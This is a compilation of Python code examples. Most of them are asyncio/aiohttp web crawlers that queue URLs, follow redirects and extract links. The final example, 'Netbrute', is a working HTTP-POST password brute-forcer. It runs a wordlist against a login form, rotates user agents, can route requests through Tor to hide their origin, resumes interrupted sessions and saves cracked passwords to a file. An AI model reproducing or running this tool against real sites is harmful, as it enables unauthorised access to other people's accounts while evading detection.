        if self.count and len(self.done) >= self.count:
            logger.warning(f'reach count: {self.count}, now quit')
            router.stop()

        if self.q.qsize() == 0:
            logger.warning('empty queue, now quit')
            yield from self.q.join()
            router.stop()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while router.is_running():
                url, max_redirect = yield from self.q.get()
                logger.debug(f'work on url {url}')
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
                yield from self.exit_on_empty_queue()

        except asyncio.CancelledError:
            logger.warning('canceling the worker')

    def url_allowed(self, url):
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            # logger.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            # logger.debug('skipping non-root host in %r', url)
            return False
        return True

    def verify_url(self, url):
        if self.include:
            for pattern in self.include:
                if re.search(pattern, url):
                    logger.debug(
                        f'{url} match include pattern: {pattern}, allowed')
                    return True
        if self.exclude and re.search(self.exclude, url):
            logger.debug(
                f'{url} match exclude pattern: {self.exclude}, rejected')
            return False
        # default False
        return False

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        logger.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        try:
            workers = [asyncio.Task(self.work(), loop=self.loop)
                       for _ in range(self.max_tasks)]
            self.t0 = time.time()
            # yield from asyncio.gather(*workers, loop=self.loop, return_exceptions=True)
            yield from router.quit_event.wait()
            for w in workers:
                w.cancel()
            self.t1 = time.time()
        except asyncio.CancelledError:
            logger.warning('canceling the crawler')
        finally:
            logger.warning('closing the crawler')
            yield from self.close()
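
# Hedged usage sketch (not from the original source): running the aspider
# Crawler above. The `router` object used by the class (its routes,
# quit_event, stop() and is_running() helpers) and the outputing helpers are
# assumed to be configured as in the aspider project; the root URL is
# illustrative.
def _run_aspider_sketch():
    import asyncio

    loop = asyncio.get_event_loop()
    crawler = Crawler(['http://example.com/'], max_tasks=10, loop=loop)
    # crawl() returns once router.quit_event is set, e.g. after the queue
    # drains and exit_on_empty_queue() calls router.stop()
    loop.run_until_complete(crawler.crawl())
    loop.close()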
예제 #18
class Crawler:
    def __init__(self, root_url: str, max_redirect: int):
        self.max_tasks = 10
        self.max_redirect = max_redirect
        self.q = Queue()
        self.seen_urls = set()

        # aiohttp's ClientSession does connection pooling and
        # HTTP keep-alives for us.
        self.session = aiohttp.ClientSession(loop=loop)

        # Put (URL, max_redirect) in the queue.
        self.q.put_nowait((root_url, self.max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """运行 crawler 直到所有的工作完成"""
        wokers = [asyncio.Task(self.work())
                  for _ in range(self.max_tasks)]

        # 当所有任务完成,退出
        yield from self.q.join()
        for w in wokers:
            w.cancel()

    @asyncio.coroutine
    def work(self):
        while True:
            url, max_redirect = yield from self.q.get()

            # Download the page and add new links to self.q.
            yield from self.fetch(url, max_redirect)
            self.q.task_done()

    @asyncio.coroutine
    def fetch(self, url: str, max_redirect: int):
        # Handle redirects ourselves.
        response = yield from self.session.get(
            url, allow_redirects=False
        )

        try:
            if is_redirect(response):
                if max_redirect > 0:
                    next_url = response.headers['location']
                    if next_url in self.seen_urls:
                        # We have already been down this path.
                        return

                    # Remember that we have seen this URL.
                    self.seen_urls.add(next_url)

                    # Follow the redirect, with one less redirect remaining.
                    self.q.put_nowait((next_url, max_redirect - 1))
            else:
                links = yield from self.parse_links(response)
                # Python set logic: only enqueue links we have not seen yet.
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            # Return the connection to the pool.
            yield from response.release()
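
# The is_redirect() helper used above is not shown in this snippet. A minimal
# sketch consistent with how it is used (detecting HTTP redirect responses so
# the crawler can follow the Location header itself) might look like this:
def is_redirect(response):
    # 3xx status codes whose Location header the crawler follows manually
    return response.status in (300, 301, 302, 303, 307)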
예제 #19
class Spider:
    def __init__(self,
                 max_tries=30,
                 max_tasks=10,
                 timeout=5,
                 rootDir=os.getcwd()):
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.loop = asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.timeout = timeout
        self.rootDir = rootDir

    def close(self):
        self.session.close()

    def append_request(self, request):
        self.q.put_nowait(request)

    @asyncio.coroutine
    def _get_request(self):
        r = yield from self.q.get()
        return r

    @asyncio.coroutine
    def fetch(self, request_type, url, params, data):
        """Fetch one URL"""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                print("try %s---->%d times" % (url, tries))
                with aiohttp.Timeout(self.timeout):
                    response = yield from self.session.get(url, params=params)
                    if response.status == 200:
                        content_type = response.headers.get('content-type')
                        if content_type in CONTENT_TYPE_TEXT:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.text(
                                    encoding='GBK')
                        else:
                            with aiohttp.Timeout(self.timeout):
                                content = yield from response.read()
                    break
            except asyncio.TimeoutError:
                print("timeout")
            except aiohttp.ClientError as client_error:
                print("client error")
            except Exception:
                print("unknown error")
            tries += 1
        else:
            print("try %s---->more than %d times, quit" % (url, tries))
            return None

        response.release()
        return content

    @asyncio.coroutine
    def _work(self):
        """Process queue items forever."""
        try:
            while True:
                r = yield from self._get_request()
                content = yield from self.fetch(r.request_type, r.url,
                                                r.params, r.data)
                if (content):
                    r.handle_func(content)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def work(self):
        yield from self._work()

    @asyncio.coroutine
    def spider(self):
        """run  the spider until all finished"""
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        yield from self.q.join()

        for w in workers:
            w.cancel()
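
# Hedged usage sketch (not from the original source): the Spider above pulls
# request objects with request_type/url/params/data/handle_func attributes
# from its queue. A simple namedtuple and driver, with an illustrative URL,
# could look like this (CONTENT_TYPE_TEXT is assumed to be defined in the
# original module):
def _run_spider_sketch():
    from collections import namedtuple

    Request = namedtuple(
        'Request', ['request_type', 'url', 'params', 'data', 'handle_func'])

    spider = Spider(max_tasks=5)
    spider.append_request(
        Request(request_type='GET',
                url='http://example.com/',
                params=None,
                data=None,
                handle_func=lambda content: print(len(content))))
    spider.loop.run_until_complete(spider.spider())
    spider.close()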
예제 #20
class Crawler:
    def __init__(self, root, max_tasks=1000, loop=None, file=None):
        LOGGER.info('Starting Crawler ...\n')
        self.loop = loop or asyncio.get_event_loop()
        self.q = Queue(loop=self.loop)
        self.visited_urls = set()
        self.max_tasks = max_tasks
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()

        parts = urllib.parse.urlparse(root)
        host, port = urllib.parse.splitport(parts.netloc)
        if re.match(r'\A[\d\.]*\Z', host):
            self.root_domains.add(host)
        else:
            host = host.lower()
            self.root_domains.add(host)

        print('Hosts : {}'.format(','.join(self.root_domains)))

        self.add_url(root)

        self.t0 = time.time()
        self.t1 = None
        filename = '{}.csv'.format(file)
        self.f = open(filename, 'w')
        self.csv = csv.writer(self.f)
        self.csv.writerow(CSV_HEADER)

    def add_url(self, url):
        LOGGER.debug('adding %r', url)
        self.visited_urls.add(url)
        self.q.put_nowait(url)

    def close(self):
        self.session.close()
        self.f.close()

    def host_okay(self, host):
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        return self._host_okay_strict(host)

    def _host_okay_strict(self, host):
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def url_allowed(self, url):
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    @asyncio.coroutine
    def parse_response(self, response):
        links = set()
        if response.status == 200:
            content_type = response.headers.get('content-type')

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r', len(urls),
                                response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

                if links:
                    LOGGER.info('got %r distinct urls from %r', len(links),
                                response.url)
                for link in links.difference(self.visited_urls):
                    self.q.put_nowait(link)
                self.visited_urls.update(links)
        return links

    @asyncio.coroutine
    def fetch(self, url):
        try:
            response = yield from self.session.get(url, allow_redirects=False)
            self.csv.writerow([url, response.status])

            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                if next_url in self.visited_urls:
                    return
                else:
                    self.add_url(next_url)
            else:
                links = yield from self.parse_response(response)

                for link in links.difference(self.visited_urls):
                    self.q.put_nowait(link)
                self.visited_urls.update(links)
            yield from response.release()
        except aiohttp.ClientError as client_error:
            LOGGER.info('try for %r raised %r', url, client_error)

    @asyncio.coroutine
    def work(self):
        try:
            while True:
                url = yield from self.q.get()
                assert url in self.visited_urls
                yield from self.fetch(url)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    @asyncio.coroutine
    def crawl(self):
        workers = [
            asyncio.Task(self.work(), loop=self.loop)
            for _ in range(self.max_tasks)
        ]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
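
# Hedged usage sketch (not from the original source): driving the CSV-writing
# Crawler above. CSV_HEADER, LOGGER and is_redirect() are assumed to be
# defined elsewhere in the original module, and the root URL and file name are
# illustrative.
def _run_csv_crawler_sketch():
    import asyncio

    loop = asyncio.get_event_loop()
    crawler = Crawler('http://example.com/', max_tasks=100, loop=loop,
                      file='example_report')
    loop.run_until_complete(crawler.crawl())
    crawler.close()  # closes the aiohttp session and the CSV file
    loop.close()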
예제 #21
class Crawler:
    """Crawl a set of URLs.

    This manages two sets of URLs: 'urls' and 'done'.  'urls' is a set of
    URLs seen, and 'done' is a list of FetchStatistics.
    Here they are kept in 'seen_urls' and 'done'.
    """
    # TODO xpath support
    # TODO uvloop support
    def __init__(self, roots,
                 exclude=None, strict=True,  # What to crawl.
                 max_redirect=10, max_tries=4,  # Per-url limits.
                 max_tasks=10, *, loop=None):
        self.loop = loop or asyncio.get_event_loop()
        self.roots = roots
        self.exclude = exclude
        self.strict = strict
        self.max_redirect = max_redirect
        self.max_tries = max_tries
        self.max_tasks = max_tasks
        self.q = Queue(loop=self.loop)
        self.seen_urls = set()
        self.done = []
        self.session = aiohttp.ClientSession(loop=self.loop)
        self.root_domains = set()
        for root in roots:
            parts = urllib.parse.urlparse(root)
            host, port = urllib.parse.splitport(parts.netloc)
            if not host:
                continue
            if re.match(r'\A[\d\.]*\Z', host):
                self.root_domains.add(host)
            else:
                host = host.lower()
                if self.strict:
                    self.root_domains.add(host)
                else:
                    self.root_domains.add(lenient_host(host))
        for root in roots:
            self.add_url(root)
        self.t0 = time.time()
        self.t1 = None

    def close(self):
        """Close resources."""
        self.session.close()

    def host_okay(self, host):
        """Check if a host should be crawled.

        A literal match (after lowercasing) is always good.  For hosts
        that don't look like IP addresses, some approximate matches
        are okay depending on the strict flag.
        """
        host = host.lower()
        if host in self.root_domains:
            return True
        if re.match(r'\A[\d\.]*\Z', host):
            return False
        if self.strict:
            return self._host_okay_strictish(host)
        else:
            return self._host_okay_lenient(host)

    def _host_okay_strictish(self, host):
        """Check if a host should be crawled, strict-ish version.

        This checks for equality modulo an initial 'www.' component.
        """
        host = host[4:] if host.startswith('www.') else 'www.' + host
        return host in self.root_domains

    def _host_okay_lenient(self, host):
        """Check if a host should be crawled, lenient version.

        This compares the last two components of the host.
        """
        return lenient_host(host) in self.root_domains

    def record_statistic(self, fetch_statistic):
        """Record the FetchStatistic for completed / failed URL."""
        self.done.append(fetch_statistic)

    @asyncio.coroutine
    def parse_links(self, response):
        """Return a FetchStatistic and list of links."""
        links = set()
        content_type = None
        encoding = None
        body = yield from response.read()

        if response.status == 200:
            content_type = response.headers.get('content-type')
            pdict = {}

            if content_type:
                content_type, pdict = cgi.parse_header(content_type)

            encoding = pdict.get('charset', 'utf-8')
            if content_type in ('text/html', 'application/xml'):
                text = yield from response.text()

                # Replace href with (?:href|src) to follow image links.
                urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''',
                                      text))
                if urls:
                    LOGGER.info('got %r distinct urls from %r',
                                len(urls), response.url)
                for url in urls:
                    normalized = urllib.parse.urljoin(response.url, url)
                    defragmented, frag = urllib.parse.urldefrag(normalized)
                    if self.url_allowed(defragmented):
                        links.add(defragmented)

        stat = FetchStatistic(
            url=response.url,
            next_url=None,
            status=response.status,
            exception=None,
            size=len(body),
            content_type=content_type,
            encoding=encoding,
            num_urls=len(links),
            num_new_urls=len(links - self.seen_urls))

        return stat, links

    @asyncio.coroutine
    def fetch(self, url, max_redirect):
        """Fetch one URL."""
        tries = 0
        exception = None
        while tries < self.max_tries:
            try:
                response = yield from self.session.get(
                    url, allow_redirects=False)

                if tries > 1:
                    LOGGER.info('try %r for %r success', tries, url)

                break
            except aiohttp.ClientError as client_error:
                LOGGER.info('try %r for %r raised %r', tries, url, client_error)
                exception = client_error

            tries += 1
        else:
            # We never broke out of the loop: all tries failed.
            LOGGER.error('%r failed after %r tries',
                         url, self.max_tries)
            self.record_statistic(FetchStatistic(url=url,
                                                 next_url=None,
                                                 status=None,
                                                 exception=exception,
                                                 size=0,
                                                 content_type=None,
                                                 encoding=None,
                                                 num_urls=0,
                                                 num_new_urls=0))
            return

        try:
            if is_redirect(response):
                location = response.headers['location']
                next_url = urllib.parse.urljoin(url, location)
                self.record_statistic(FetchStatistic(url=url,
                                                     next_url=next_url,
                                                     status=response.status,
                                                     exception=None,
                                                     size=0,
                                                     content_type=None,
                                                     encoding=None,
                                                     num_urls=0,
                                                     num_new_urls=0))

                if next_url in self.seen_urls:
                    return
                if max_redirect > 0:
                    LOGGER.info('redirect to %r from %r', next_url, url)
                    self.add_url(next_url, max_redirect - 1)
                else:
                    LOGGER.error('redirect limit reached for %r from %r',
                                 next_url, url)
            else:
                stat, links = yield from self.parse_links(response)
                self.record_statistic(stat)
                for link in links.difference(self.seen_urls):
                    self.q.put_nowait((link, self.max_redirect))
                self.seen_urls.update(links)
        finally:
            yield from response.release()

    @asyncio.coroutine
    def work(self):
        """Process queue items forever."""
        try:
            while True:
                url, max_redirect = yield from self.q.get()
                assert url in self.seen_urls
                yield from self.fetch(url, max_redirect)
                self.q.task_done()
        except asyncio.CancelledError:
            pass

    def url_allowed(self, url):
        if self.exclude and re.search(self.exclude, url):
            return False
        parts = urllib.parse.urlparse(url)
        if parts.scheme not in ('http', 'https'):
            LOGGER.debug('skipping non-http scheme in %r', url)
            return False
        host, port = urllib.parse.splitport(parts.netloc)
        if not self.host_okay(host):
            LOGGER.debug('skipping non-root host in %r', url)
            return False
        return True

    def add_url(self, url, max_redirect=None):
        """Add a URL to the queue if not seen before."""
        if max_redirect is None:
            max_redirect = self.max_redirect
        LOGGER.debug('adding %r %r', url, max_redirect)
        self.seen_urls.add(url)
        self.q.put_nowait((url, max_redirect))

    @asyncio.coroutine
    def crawl(self):
        """Run the crawler until all finished."""
        workers = [asyncio.Task(self.work(), loop=self.loop)
                   for _ in range(self.max_tasks)]
        self.t0 = time.time()
        yield from self.q.join()
        self.t1 = time.time()
        for w in workers:
            w.cancel()
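
# The FetchStatistic record and lenient_host() helper used above are not shown
# in this snippet. Sketches consistent with how they are used (the field names
# come directly from the calls above; lenient_host compares only the last two
# host components) might look like this:
import collections


FetchStatistic = collections.namedtuple(
    'FetchStatistic',
    ['url', 'next_url', 'status', 'exception', 'size', 'content_type',
     'encoding', 'num_urls', 'num_new_urls'])


def lenient_host(host):
    # keep only the last two dot-separated components of the host name
    parts = host.split('.')[-2:]
    return ''.join(parts)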
예제 #22
class Netbrute:
    """
    HTTP-POST BruteForcer
    """
    def __init__(self, loop, pre_url=None, pre_payload=None, target_url=None,
                 login=None, payload_model=None, wordlist=None,
                 error_string=None, tasks=64, tor=None, tor_address=None,
                 debug=None):
        self.max_tasks = tasks
        self.queue = Queue()
        self.pre_url = pre_url
        self.pre_payload = self._generate_payload_type(pre_payload)
        self.attack_url = target_url
        self.login = login
        self.error_string = [x.strip() for x in error_string.split(',')]
        self.payload = self._generate_payload_type(payload_model)
        self.wordlist = wordlist
        self.found = Event()
        self.tor_use = tor
        #self.session = self._generate_new_session(loop)
        self.debug = debug
        self.runned_passwords = set()
        self.old_passwds = set()
        self.restore_files = []
        self.progress_bar = None
        self.ua = self._prepare_user_agents()
        self.start_time = time.time()
        self.last_report_time = time.time()

        # Statuses set of settings
        self.loaded_passwords = 0
        self.tried_passwords = 0
        self.error_passwords = 0
        self.max_passwords = 0

        # Tor set of settings
        if self.tor_use is not None and tor_address is not None:
            ip, port = parse_proxy_address(tor_address)
            self.tor_address = "http://{0}:{1}".format(ip, port)
            self.tor_address_string = tor_address

        # Session set of settings
        self.session_name = self._generate_session_name()
        restore_files = self._search_open_session()
        if restore_files > 0:
            for file in self.restore_files:
                if self._load_old_session(file) is True:
                    break
        else:
            pass

    @staticmethod
    def _prepare_user_agents():
        #  Load user agents
        ua = get_user_agents()
        if not ua:
            raise Exception("No user agents available")
        return ua

    def _load_old_session(self, fn):
        """
        Ask the user whether to reuse a restore file. If accepted, this also
        decompresses the file (when possible) and reads its data into the
        main object.
        :param fn: String => Filename
        :return: Boolean
        """

        question = input("\n[*] Do you want to load passwords from file '{0}'? [y/N] ".format(os.path.basename(fn)))

        if question.upper() == "Y":
            try:
                #  Decompress the data and store it raw
                with gzip.open(fn, "rb", compresslevel=9) as f:
                    _data = f.read()
                with open(fn, "wb") as f:
                    f.write(_data)
            except:
                #  If decompression fails, the file probably is not
                #  compressed, so open it and read it as-is.
                with open(fn, "rb") as f:
                    _data = f.read()

            #  Read data from file, decode it from BinaryBuffer to String.
            lines = [x.decode() for x in _data.split(b"\n")]

            #  Finally, add each line to old_passwords set.
            for line in lines:
                if line != "":
                    self.old_passwds.add(line)

            #  Define the session name as the restore file used.
            self.session_name = os.path.basename(fn)
            return True
        else:
            return False

    def _search_open_session(self):
        current_dir = os.getcwd() + os.sep
        for root, dirc, files in os.walk(current_dir):
            for f in files:
                if f.endswith(".restore"):
                    file_path = os.path.join(root, f)
                    self.restore_files.append(file_path)
        return len(self.restore_files)

    @staticmethod
    def _generate_session_name():
        _id = hex(random.randint(0, 999999))
        return "session_{0}.restore".format(_id[2:])

    @staticmethod
    def _generate_payload_type(user_input):
        """
        Function responsible for transforming String type into Dictionary type
        :param user_input: str
        :return: d: dict
        """
        d = dict()
        p = [x.strip() for x in user_input.split(",")]
        for element in p:
            key, value = element.split(":")
            d[key] = value
        return d
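
    #  Illustration (derived from the code above; the field names in the input
    #  string are assumed):
    #      _generate_payload_type("username:LOGIN, password:PASS")
    #      returns {'username': 'LOGIN', 'password': 'PASS'}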

    @staticmethod
    def _encode_payload_www(unencoded_payload):
        """
        Function responsible for transforming a dictionary payload into x-www-form-urlencoded payload
        :param unencoded_payload:
        :return:
        """
        pl = str()
        dict_len = len(unencoded_payload)
        i = 1
        for key in unencoded_payload:
            if i != dict_len:
                pl += "{0}={1}&".format(key, unencoded_payload[key])
            else:
                pl += "{0}={1}".format(key, unencoded_payload[key])
            i += 1
        return pl

    def _adjust_payload(self, payload, password=None, login=None):
        """
        Creates a copy of the payload supplied by the user, then fills it with
        the attack data (login and/or password).
        :param password: String
        :param login: String
        :return: tmp_payload: dict
        """
        tmp_payload = copy(payload)
        for key in tmp_payload:
            value = tmp_payload[key]
            if value.upper() == "PASS":
                #  Modify the payload prototype with the queue's password.
                if password is not None:
                    tmp_payload[key] = password

            elif value.upper() == "LOGIN":
                #  Modify the payload prototype with the supplied login
                if login is not None:
                    tmp_payload[key] = login
            else:
                continue
        return tmp_payload

    @staticmethod
    def _store_data(fn, data):
        """
        Stores buffer of data into a file and adds a new line at the end of it.
        :param fn: String => Filename for a file
        :param data: String => Data buffer
        :return: None
        """
        data += "\n"
        with open(fn, "a") as f:
            f.write(data)
        return

    def _increment_progress_bar(self):
        """
        Check whether one second has passed since the last report, then
        refresh the progress bar with the current attack progress.
        :return: None
        """
        if (time.time() - self.last_report_time) < 1:
            return
        self.last_report_time = time.time()
        self.progress_bar.update((self.max_passwords - self.loaded_passwords) + self.tried_passwords)

    def _parse_response(self, status, response_url, passwd):
        """
        Parses the response packet based on http status code and response URL
        :param status: Integer => HTTP status code
        :param response_url: String => Request URL response
        :param passwd: String => Password that originated this response
        :return: None
        """
        for error_string in self.error_string:
            if isinstance(response_url, yarl.URL):
                response_url = response_url.query_string
            if error_string in response_url:
                self.tried_passwords += 1
                self.runned_passwords.add(passwd)
                if len(self.runned_passwords) % 100 == 0:
                    [self._store_data(self.session_name, x) for x in self.runned_passwords]
                    self.runned_passwords.clear()
                return
        if status == 200:
            print("\n[+] Password was found: {0}".format(passwd))
            print("[*] Response URL: {0}".format(response_url))
            self._store_data("correct.pass", passwd)
            self._store_data("correct.pass", "{0}\n\n".format(self.payload))
            self.found.set()
        return


    async def pre_page_request(self, session):
        #  Use tor or not
        if self.tor_use is True:
            proxy_addr = self.tor_address
        else:
            proxy_addr = None

        #  We will always create new headers for you, dear sysadmin...
        headers = {
            "content-type": "application/x-www-form-urlencoded",
            "User-Agent": random.choice(self.ua),
        }

        #  Generate the payload
        custom_payload = self._adjust_payload(self.pre_payload, login=self.login)

        # Do the first request.
        async with session.post(self.pre_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response:
            status, response_url = response.status, response.url
            if status == 200:
                return 0, headers
            else:
                return 1, headers


    async def attack_this(self, session, password, headers=None):
        """
        Perform IO operation for http request
        :param password: String => Password used in the attack
        :return: None
        """
        if self.debug:
            print("Started attack!")

        #  Build headers if none were supplied by a previous request.
        if headers is None:
            headers = {
                "content-type": "application/x-www-form-urlencoded",
                "User-Agent": random.choice(self.ua),
            }

        custom_payload = self._adjust_payload(self.payload, password=password)

        # AsyncTimeout removed since commit c47781f
        #  with async_timeout.timeout(10):
        if self.tor_use is True:
            proxy_addr = self.tor_address
        else:
            proxy_addr = None
        async with session.post(self.attack_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response:

            status, response_url = response.status, response.url

            self._parse_response(status, response_url, password)

            if self.debug is False:
                self._increment_progress_bar()

            if self.debug:
                print("Ended attack! [{0}] - Status: {1} - URL: {2}".format(password, status, response_url))
        return

    def _parse_wordlist(self, iterable):
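        """Filters out passwords that are already present in self.old_passwds."""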
        return list(filter(lambda x: x not in self.old_passwds, iterable))

    def _read_wordlist(self):
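        """
        Reads the wordlist file, skips previously tried passwords and fills the queue
        :return: Integer => Number of passwords actually queued
        """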
        with open(self.wordlist, "r") as f:
            tmp_list = [line.rstrip("\n") for line in f]
        parsed_list = self._parse_wordlist(tmp_list)
        for element in parsed_list:
            self.queue.put_nowait(element)
        self.max_passwords = len(tmp_list)
        self.loaded_passwords = len(parsed_list)
        return len(parsed_list)


    def _generate_new_session(self, loop):
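        """
        Builds a fresh aiohttp.ClientSession with its own cookie jar, routed through tor when enabled
        :param loop: asyncio event loop the session is bound to
        :return: aiohttp.ClientSession
        """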
        #  Create cookie jar
        jar = aiohttp.CookieJar(unsafe=True)

        #  Adjust session object and tor usage information
        if self.tor_use is True:
            #print("[+] Using tor with address {0}\n".format(self.tor_address_string))
            conn = get_tor_connector(self.tor_address_string)
            session = aiohttp.ClientSession(loop=loop, cookie_jar=jar, connector=conn)
        else:
            session = aiohttp.ClientSession(loop=loop, cookie_jar=jar)
        return session

    @asyncio.coroutine
    def work(self, loop):
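        """
        Worker coroutine: pulls passwords from the queue and tests them until the queue is drained
        :param loop: asyncio event loop used to build each session
        :return: None
        """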
        while not self.queue.empty():
            #  Create new aiohttp session
            session = self._generate_new_session(loop)
            #  If the password was already found, drain the remaining queue so that
            #  queue.join() in initiate() can return, then stop this worker
            if self.found.is_set():
                # noinspection PyProtectedMember
                for _ in range(len(self.queue._queue)):
                    yield from self.queue.get()
                    self.queue.task_done()
                session.close()
                break

            #  Retrieve passwords from queue and test them
            password = yield from self.queue.get()

            # Do the request; on failure, re-queue the password and move on
            try:
                k, headers = yield from self.pre_page_request(session)
                if k == 0:
                    yield from self.attack_this(session, password, headers=headers)
            except Exception as e:
                if self.debug:
                    print("Password '{0}' request failed (timeout or connection error).".format(password))
                    print("Error: {0}\n".format(e))
                self.queue.put_nowait(password)
            session.close()
            self.queue.task_done()

    @asyncio.coroutine
    def initiate(self, loop):
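        """
        Prepares the attack (wordlist, progress bar) and runs the worker tasks until the queue is done
        :param loop: asyncio event loop the workers run on
        :return: None
        """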

        #  Attack preparation phase
        if self.debug:
            print("Started initiation!")
        pass_number = self._read_wordlist()
        print("\n[*] Program have read {0} passwords.\n".format(pass_number))

        #  Graphical visualization of attack status
        self.progress_bar = ProgressBar(
            widgets=["Guesses: ", Counter(), "/", str(self.max_passwords),
                     " [", Percentage(), "] ", Bar(marker="#"), " ", AdaptiveETA()],
            maxval=self.max_passwords).start()
        self.progress_bar.update(self.max_passwords - pass_number)

        #  Spawn the worker tasks and wait until every queued password has been processed
        workers = [asyncio.Task(self.work(loop)) for _ in range(self.max_tasks)]
        yield from self.queue.join()
        for w in workers:
            w.cancel()
        if self.debug:
            print("Ended initiation!")